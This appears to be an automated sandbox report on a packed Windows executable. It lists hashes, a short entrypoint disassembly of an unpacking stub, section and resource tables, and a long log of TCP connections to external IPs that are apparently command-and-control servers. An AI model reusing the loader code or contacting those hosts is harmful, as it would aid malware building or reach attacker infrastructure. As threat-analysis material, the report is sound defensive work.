SHA512:	a8572584dd73f2550184595305f60412d1170db9ef6f2109ce64bd3b05a7101982ebd29352e68b1473e4ae86b0b6e9bddfb04dcbc8b8bf5ab41df020420c7d8a
SSDEEP:	6144:OK+/nlJyamKOrllFIFkRqqfc+MYCvNxrQWSFS:Ejy3PLIF3qU+lOxrl
TLSH:	5744011BDBC50A3DE06F87330C0A6972BE62F64D20754F3503989958FD1AA2334EE2B4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]e.......................$......Rich............PE..L....\`V.............................]............@........................

File Icon


Icon Hash:	600ceef6e49a9040

Static PE Info

General

Entrypoint:	0x4b5d8e
Entrypoint Section:	DINGBOY
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x56605CBF [Thu Dec 3 15:16:15 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e0ce5ef0bca7a89405f5a38e31b7697b

Entrypoint Preview

Instruction
push ebp
push edi
push esi
push edx
push ecx
push ebx
add bx, 02EBh
jmp 00007F244C7AEE8Eh
add bx, 02EBh
jmp 00007F244C7AEE8Eh
pop eax
pop eax
pop eax
pop eax
pop eax
pop eax
pushad
call 00007F244C7AEE95h
mov ebp, dword ptr [esp]
add esp, 04h
jmp 00007F244C7AEE95h
or eax, 03EB0000h
or al, 00h
add byte ptr [ebp+00264BB5h], cl
add byte ptr [ebp+00034E9Dh], cl
add byte ptr [ebx], dh
jmp far eax
mov byte ptr [edx], al
add byte ptr [eax], al
jmp 00007F244C7AEE95h
sbb byte ptr [eax], al
add byte ptr [edx+40h], ch
push 00001000h
push 000C2000h
push 00000000h
call dword ptr [ebp+00000AF9h]
mov dword ptr [ebp+00001AF1h], eax
jmp 00007F244C7AEE95h
adc al, 00h
add bl, ch
adc al, 60h
push dword ptr [ebp+00001AF1h]
push dword ptr [edi+esi]
push dword ptr [edi+esi+04h]
call ebx
popad
add edi, 08h
cmp dword ptr [edi+esi], 00000000h
jne 00007F244C7AEE78h
lea esi, dword ptr [edi+esi+04h]
cmp dword ptr [ebp+00002362h], 01h
jne 00007F244C7AEED6h
xor edi, edi
pushad
jmp 00007F244C7AEEC1h
mov eax, dword ptr [esi]
mov ebx, dword ptr [esi+04h]
mov edx, dword ptr [esi+08h]
call 00007F244C7AF0A6h
lea ecx, dword ptr [ebp+000020B1h]
push ecx
or edx, edx
jne 00007F244C7AEE96h
push 00000020h
jmp 00007F244C7AEE94h
push 00000040h
push eax
push ebx
call dword ptr [ebp+00000B01h]
add esi, 0Ch
cmp dword ptr [esi], FFFFFFFFh
jne 00007F244C7AEE93h
inc edi
or edi, edi
je 00007F244C7AEE5Fh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb686a	0x28	DINGBOY
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb8912	0x3774	DINGBOY
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
DINGBOY	0x1000	0x7a000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DINGBOY	0x7b000	0x41086	0x41086	False	0.945129779933477	data	7.909826423981474	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country
GUI	0x1f700	0x2f000	empty	Chinese	China
RT_ICON	0xbb012	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320
RT_ICON	0xbb57a	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320
RT_ICON	0xbbae2	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320
RT_MENU	0x4f738	0x198	empty	English	United States
RT_MENU	0x4f8d0	0x214	empty	English	United States
RT_MENU	0x4fae4	0x24	empty	English	United States
RT_MENU	0x4fb08	0x61c	empty	English	United States
RT_MENU	0x50124	0x9c8	empty	English	United States
RT_MENU	0x50aec	0x11c	empty	English	United States
RT_MENU	0x50c08	0x134	empty	English	United States
RT_MENU	0x50d3c	0xc4	empty	English	United States
RT_MENU	0x50e00	0x198	empty	English	United States
RT_MENU	0x50f98	0x17c	empty	English	United States
RT_MENU	0x51114	0x148	empty	English	United States
RT_DIALOG	0x5125c	0x41a	empty	English	United States
RT_DIALOG	0x51678	0x92c	empty	English	United States
RT_DIALOG	0x51fa4	0x814	empty	English	United States
RT_DIALOG	0x527b8	0x490	empty	English	United States
RT_DIALOG	0x52c48	0xf8	empty	English	United States
RT_DIALOG	0x52d40	0x178	empty	English	United States
RT_DIALOG	0x52eb8	0x328	empty	English	United States
RT_DIALOG	0x531e0	0x3d4	empty	English	United States
RT_DIALOG	0x535b4	0x134	empty	English	United States
RT_DIALOG	0x536e8	0x65e	empty	English	United States
RT_DIALOG	0x53d48	0x3ea	empty	English	United States
RT_DIALOG	0x54134	0xf6	empty	English	United States
RT_DIALOG	0x5422c	0x1b6	empty	English	United States
RT_DIALOG	0x543e4	0x210	empty	English	United States
RT_DIALOG	0x545f4	0x6ae	empty	English	United States
RT_DIALOG	0x54ca4	0x2c4	empty	English	United States
RT_DIALOG	0x54f68	0x4e8	empty	English	United States
RT_DIALOG	0x55450	0x2f8	empty	English	United States
RT_DIALOG	0x55748	0x31e	empty	English	United States
RT_DIALOG	0x55a68	0x212	empty	English	United States
RT_DIALOG	0x55c7c	0x3fa	empty	English	United States
RT_DIALOG	0x56078	0x30a	empty	English	United States
RT_DIALOG	0x56384	0x8a8	empty	English	United States
RT_DIALOG	0x56c2c	0x43c	empty	English	United States
RT_DIALOG	0x57068	0x112	empty	English	United States
RT_DIALOG	0x5717c	0x27a	empty	English	United States
RT_DIALOG	0x573f8	0x33a	empty	English	United States
RT_DIALOG	0x57734	0x2ac	empty	English	United States
RT_DIALOG	0x579e0	0x310	empty	English	United States
RT_DIALOG	0x57cf0	0x3f6	empty	English	United States
RT_DIALOG	0x580e8	0x398	empty	English	United States
RT_DIALOG	0x58480	0x232	empty	English	United States
RT_DIALOG	0x586b4	0x132	empty	English	United States
RT_DIALOG	0x587e8	0x1e4	empty	English	United States
RT_DIALOG	0x589cc	0x458	empty	English	United States
RT_DIALOG	0x58e24	0x358	empty	English	United States
RT_DIALOG	0x5917c	0x344	empty	English	United States
RT_DIALOG	0x594c0	0x678	empty	English	United States
RT_DIALOG	0x59b38	0x592	empty	English	United States
RT_DIALOG	0x5a0cc	0x576	empty	English	United States
RT_DIALOG	0x5a644	0x2da	empty	English	United States
RT_DIALOG	0x5a920	0x27c	empty	English	United States
RT_DIALOG	0x5ab9c	0x456	empty	English	United States
RT_DIALOG	0x5aff4	0x3ec	empty	English	United States
RT_DIALOG	0x5b3e0	0x19a	empty	English	United States
RT_DIALOG	0x5b57c	0x2ac	empty	English	United States
RT_DIALOG	0x5b828	0x104	empty	English	United States
RT_DIALOG	0x5b92c	0xac	empty	English	United States
RT_DIALOG	0x5b9d8	0x3b4	empty	English	United States
RT_DIALOG	0x5bd8c	0x274	empty	English	United States
RT_DIALOG	0x5c000	0x2b0	empty	English	United States
RT_DIALOG	0x5c2b0	0x320	empty	English	United States
RT_DIALOG	0x5c5d0	0x4d8	empty	English	United States
RT_DIALOG	0x5caa8	0x4ac	empty	English	United States
RT_DIALOG	0x5cf54	0xbc	empty	English	United States
RT_DIALOG	0x5d010	0x1e4	empty	English	United States
RT_DIALOG	0x5d1f4	0x6a6	empty	English	United States
RT_DIALOG	0x5d89c	0x108	empty	English	United States
RT_DIALOG	0x5d9a4	0x2d6	empty	English	United States
RT_DIALOG	0x5dc7c	0x21a	empty	English	United States
RT_DIALOG	0x5de98	0x262	empty	English	United States
RT_DIALOG	0x5e0fc	0x2f2	empty	English	United States
RT_DIALOG	0x5e3f0	0x206	empty	English	United States
RT_DIALOG	0x5e5f8	0x24e	empty	English	United States
RT_DIALOG	0x5e848	0x1aa	empty	English	United States
RT_DIALOG	0x5e9f4	0x1be	empty	English	United States
RT_DIALOG	0x5ebb4	0x1ea	empty	English	United States
RT_DIALOG	0x5eda0	0x2a6	empty	English	United States
RT_DIALOG	0x5f048	0x232	empty	English	United States
RT_DIALOG	0x5f27c	0x18e	empty	English	United States
RT_DIALOG	0x5f40c	0x2c2	empty	English	United States
RT_DIALOG	0x5f6d0	0x2ce	empty	English	United States
RT_DIALOG	0x5f9a0	0x30e	empty	English	United States
RT_DIALOG	0x5fcb0	0x30e	empty	English	United States
RT_DIALOG	0x5ffc0	0x2ee	empty	English	United States
RT_DIALOG	0x602b0	0x2bc	empty	English	United States
RT_DIALOG	0x6056c	0x41a	empty	English	United States
RT_DIALOG	0x60988	0x292	empty	English	United States
RT_DIALOG	0x60c1c	0x35c	empty	English	United States
RT_DIALOG	0x60f78	0x3ba	empty	English	United States
RT_DIALOG	0x61334	0x2c6	empty	English	United States
RT_DIALOG	0x615fc	0x272	empty	English	United States
RT_DIALOG	0x61870	0x7a0	empty	English	United States
RT_DIALOG	0x62010	0x5cc	empty	English	United States
RT_DIALOG	0x625dc	0x292	empty	English	United States
RT_DIALOG	0x62870	0x486	empty	English	United States
RT_DIALOG	0x62cf8	0x4ce	empty	English	United States
RT_DIALOG	0x631c8	0x2de	empty	English	United States
RT_DIALOG	0x634a8	0x482	empty	English	United States
RT_DIALOG	0x6392c	0xd6	empty	English	United States
RT_DIALOG	0x63a04	0x336	empty	English	United States
RT_DIALOG	0x63d3c	0x560	empty	English	United States
RT_DIALOG	0x6429c	0x20e	empty	English	United States
RT_DIALOG	0x644ac	0x5be	empty	English	United States
RT_DIALOG	0x64a6c	0x23c	empty	English	United States
RT_DIALOG	0x64ca8	0x340	empty	English	United States
RT_DIALOG	0x64fe8	0x1e8	empty	English	United States
RT_DIALOG	0x651d0	0x4b0	empty	English	United States
RT_DIALOG	0x65680	0x11e	empty	English	United States
RT_DIALOG	0x657a0	0x394	empty	English	United States
RT_DIALOG	0x65b34	0x3d0	empty	English	United States
RT_DIALOG	0x65f04	0x12c	empty	English	United States
RT_DIALOG	0x66030	0x150	empty	English	United States
RT_DIALOG	0x66180	0x108	empty	English	United States
RT_DIALOG	0x66288	0x23c	empty	English	United States
RT_DIALOG	0x664c4	0x4ec	empty	English	United States
RT_DIALOG	0x669b0	0x168	empty	English	United States
RT_DIALOG	0x66b18	0x1d4	empty	English	United States
RT_DIALOG	0x66cec	0xc8	empty	English	United States
RT_DIALOG	0x66db4	0xe8	empty	English	United States
RT_DIALOG	0x66e9c	0x386	empty	English	United States
RT_DIALOG	0x67224	0xd6	empty	English	United States
RT_DIALOG	0x672fc	0x7b0	empty	English	United States
RT_DIALOG	0x67aac	0x36e	empty	English	United States
RT_DIALOG	0x67e1c	0x2f4	empty	English	United States
RT_DIALOG	0x68110	0x134	empty	English	United States
RT_DIALOG	0x68244	0x5ce	empty	English	United States
RT_DIALOG	0x68814	0x4f4	empty	English	United States
RT_DIALOG	0x68d08	0x4c8	empty	English	United States
RT_DIALOG	0x691d0	0x494	empty	English	United States
RT_DIALOG	0x69664	0x346	empty	English	United States
RT_DIALOG	0x699ac	0x436	empty	English	United States
RT_DIALOG	0x69de4	0x49e	empty	English	United States
RT_DIALOG	0x6a284	0x336	empty	English	United States
RT_DIALOG	0x6a5bc	0x4aa	empty	English	United States
RT_DIALOG	0x6aa68	0x2ee	empty	English	United States
RT_DIALOG	0x6ad58	0x2f0	empty	English	United States
RT_DIALOG	0x6b048	0x2ba	empty	English	United States
RT_DIALOG	0x6b304	0x63c	empty	English	United States
RT_DIALOG	0x6b940	0x3f8	empty	English	United States
RT_DIALOG	0x6bd38	0x46e	empty	English	United States
RT_DIALOG	0x6c1a8	0x7d0	empty	English	United States
RT_DIALOG	0x6c978	0x114	empty	English	United States
RT_DIALOG	0x6ca8c	0x6b0	empty	English	United States
RT_DIALOG	0x6d13c	0x3fa	empty	English	United States
RT_DIALOG	0x6d538	0x52e	empty	English	United States
RT_DIALOG	0x6da68	0x3c0	empty	English	United States
RT_DIALOG	0x6de28	0x524	empty	English	United States
RT_DIALOG	0x6e34c	0x404	empty	English	United States
RT_DIALOG	0x6e750	0x164	empty	English	United States
RT_DIALOG	0x6e8b4	0x1da	empty	English	United States
RT_DIALOG	0x6ea90	0x100	empty	English	United States
RT_DIALOG	0x6eb90	0xf2	empty	English	United States
RT_DIALOG	0x6ec84	0x2c2	empty	English	United States
RT_DIALOG	0x6ef48	0x2b8	empty	English	United States
RT_DIALOG	0x6f200	0x334	empty	English	United States
RT_DIALOG	0x6f534	0x240	empty	English	United States
RT_DIALOG	0x6f774	0x7fc	empty	English	United States
RT_DIALOG	0x6ff70	0x30a	empty	English	United States
RT_DIALOG	0x7027c	0x2b0	empty	English	United States
RT_DIALOG	0x7052c	0x300	empty	English	United States
RT_DIALOG	0x7082c	0x3d0	empty	English	United States
RT_DIALOG	0x70bfc	0x816	empty	English	United States
RT_DIALOG	0x71414	0x254	empty	English	United States
RT_DIALOG	0x71668	0x52e	empty	English	United States
RT_DIALOG	0x71b98	0x330	empty	English	United States
RT_DIALOG	0x71ec8	0x2d8	empty	English	United States
RT_DIALOG	0x721a0	0x408	empty	English	United States
RT_DIALOG	0x725a8	0x10c	empty	English	United States
RT_DIALOG	0x726b4	0xec	empty	English	United States
RT_DIALOG	0x727a0	0xec	empty	English	United States
RT_DIALOG	0x7288c	0x60	empty	English	United States
RT_DIALOG	0x728ec	0x3c2	empty	English	United States
RT_DIALOG	0x72cb0	0x6b4	empty	English	United States
RT_DIALOG	0x73364	0x75c	empty	English	United States
RT_DIALOG	0x73ac0	0xcc2	empty	English	United States
RT_DIALOG	0x74784	0x440	empty	English	United States
RT_DIALOG	0x74bc4	0x64c	empty	English	United States
RT_DIALOG	0x75210	0x5e8	empty	English	United States
RT_DIALOG	0x757f8	0x18a	empty	English	United States
RT_DIALOG	0x75984	0x120	empty	English	United States
RT_DIALOG	0x75aa4	0x470	empty	English	United States
RT_DIALOG	0x75f14	0x392	empty	English	United States
RT_DIALOG	0x762a8	0x342	empty	English	United States
RT_DIALOG	0x765ec	0x2fe	empty	English	United States
RT_DIALOG	0x768ec	0x4e8	empty	English	United States
RT_DIALOG	0x76dd4	0x18a	empty	English	United States
RT_DIALOG	0x76f60	0x550	empty	English	United States
RT_DIALOG	0x774b0	0x3d0	empty	English	United States
RT_DIALOG	0x77880	0x4b2	empty	English	United States
RT_DIALOG	0x77d34	0x492	empty	English	United States
RT_DIALOG	0x781c8	0x3d6	empty	English	United States
RT_DIALOG	0x785a0	0x412	empty	English	United States
RT_DIALOG	0x789b4	0x3b4	empty	English	United States
RT_DIALOG	0x78d68	0x526	empty	English	United States
RT_GROUP_ICON	0xbc04a	0x14	data
RT_GROUP_ICON	0xbc05e	0x14	data
RT_GROUP_ICON	0xbc072	0x14	data

Imports

DLL	Import
kernel32.dll	LoadLibraryA, GetProcAddress, VirtualAlloc, VirtualFree, VirtualProtect, GetModuleHandleA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 8, 2023 11:58:37.476399899 CET	49695	18530	192.168.2.3	107.163.56.231
Feb 8, 2023 11:58:37.476663113 CET	49696	18530	192.168.2.3	107.163.56.110
Feb 8, 2023 11:58:40.489743948 CET	49696	18530	192.168.2.3	107.163.56.110
Feb 8, 2023 11:58:40.489777088 CET	49695	18530	192.168.2.3	107.163.56.231
Feb 8, 2023 11:58:46.490232944 CET	49695	18530	192.168.2.3	107.163.56.231
Feb 8, 2023 11:58:46.493447065 CET	49696	18530	192.168.2.3	107.163.56.110
Feb 8, 2023 11:58:59.558862925 CET	49698	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 11:59:02.570662975 CET	49698	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 11:59:02.579674006 CET	49699	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:02.584466934 CET	49700	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:05.570956945 CET	49700	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:05.586527109 CET	49699	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:06.616867065 CET	49701	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:07.191344976 CET	49702	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:07.226444006 CET	49703	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:08.711874008 CET	49698	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 11:59:09.727591038 CET	49701	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:10.305708885 CET	49702	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:10.336986065 CET	49703	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:10.670507908 CET	49704	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:10.802270889 CET	49705	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:11.098299980 CET	49706	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:13.743612051 CET	49704	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:13.915518999 CET	49705	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:14.227986097 CET	49706	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:14.742537975 CET	49707	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:14.867182970 CET	49708	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:15.238030910 CET	49709	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:17.915754080 CET	49707	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:18.040747881 CET	49708	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:18.415842056 CET	49709	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:18.809722900 CET	49710	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:18.944046021 CET	49711	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:19.225699902 CET	49713	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:20.830259085 CET	49714	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 11:59:21.837946892 CET	49710	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:22.103589058 CET	49711	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:22.228672981 CET	49713	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:22.887243986 CET	49715	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:23.016499996 CET	49716	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:23.109291077 CET	49717	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:23.916244984 CET	49714	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 11:59:26.041450977 CET	49715	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:26.104067087 CET	49716	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:26.242784023 CET	49717	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:27.018491983 CET	49718	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:27.195765972 CET	49719	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:27.914030075 CET	49720	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:29.916716099 CET	49714	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 11:59:30.104249001 CET	49718	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:30.229310036 CET	49719	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:31.033658981 CET	49721	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:31.158741951 CET	49722	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:31.546104908 CET	49723	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:34.104603052 CET	49721	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:34.229630947 CET	49722	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:34.604640007 CET	49723	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:35.052417994 CET	49724	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:35.180167913 CET	49725	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:35.249850035 CET	49726	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:38.214353085 CET	49725	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:38.229929924 CET	49724	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:38.339319944 CET	49726	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:39.198714018 CET	49727	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:39.313574076 CET	49728	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:39.351934910 CET	49729	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:42.046710968 CET	49730	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 11:59:42.183449984 CET	49727	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:42.339701891 CET	49728	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:42.355324030 CET	49729	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:43.368586063 CET	49731	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:44.831480980 CET	49732	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:45.058706999 CET	49730	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 11:59:45.663043976 CET	49733	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:46.371256113 CET	49731	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:47.378340960 CET	49734	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:47.548405886 CET	49735	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:47.609127998 CET	49736	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:50.543436050 CET	49734	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:50.668471098 CET	49735	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:50.669002056 CET	49736	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:51.231091022 CET	49730	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 11:59:51.425841093 CET	49737	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:51.629407883 CET	49738	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:51.652141094 CET	49739	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:54.543766975 CET	49737	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:54.668797016 CET	49738	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:54.731400967 CET	49739	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:55.488677979 CET	49740	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:55.613238096 CET	49741	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:55.690136909 CET	49742	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:58.669246912 CET	49740	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:58.731676102 CET	49741	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:58.872374058 CET	49742	80	192.168.2.3	202.108.0.52
Feb 8, 2023 11:59:59.571732044 CET	49743	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:59.692763090 CET	49744	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 11:59:59.707258940 CET	49745	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:02.732045889 CET	49744	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:02.736036062 CET	49743	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:02.872678995 CET	49745	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:03.813931942 CET	49746	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:03.820692062 CET	49747	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 12:00:04.698846102 CET	49748	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:05.408726931 CET	49749	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:06.841785908 CET	49746	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:06.872956038 CET	49747	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 12:00:07.732431889 CET	49748	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:07.856117010 CET	49750	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:07.989873886 CET	49751	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:08.391654015 CET	49752	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:11.045146942 CET	49750	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:11.060791016 CET	49751	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:11.560895920 CET	49752	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:11.923332930 CET	49753	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:12.113703012 CET	49754	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:12.327521086 CET	49755	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:12.873562098 CET	49747	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 12:00:15.052284956 CET	49753	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:15.170641899 CET	49754	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:15.342403889 CET	49755	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:16.004266024 CET	49756	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:16.169240952 CET	49757	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:16.251070023 CET	49758	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:19.061598063 CET	49756	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:19.233439922 CET	49757	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:19.374068975 CET	49758	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:20.099982977 CET	49759	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:20.230170965 CET	49760	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:20.263588905 CET	49761	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:23.233683109 CET	49759	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:23.233690977 CET	49760	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:23.374392033 CET	49761	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:24.675895929 CET	49762	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:24.795388937 CET	49763	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:24.971731901 CET	49764	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:25.004843950 CET	49765	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 12:00:27.734087944 CET	49762	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:27.874702930 CET	49763	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:28.046654940 CET	49764	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:28.062344074 CET	49765	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 12:00:28.748872995 CET	49766	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:28.973664045 CET	49767	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:29.231781006 CET	49768	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:31.843785048 CET	49766	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:32.062583923 CET	49767	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:32.375178099 CET	49768	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:32.742732048 CET	49769	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:32.855957031 CET	49770	18963	192.168.2.3	107.163.56.232
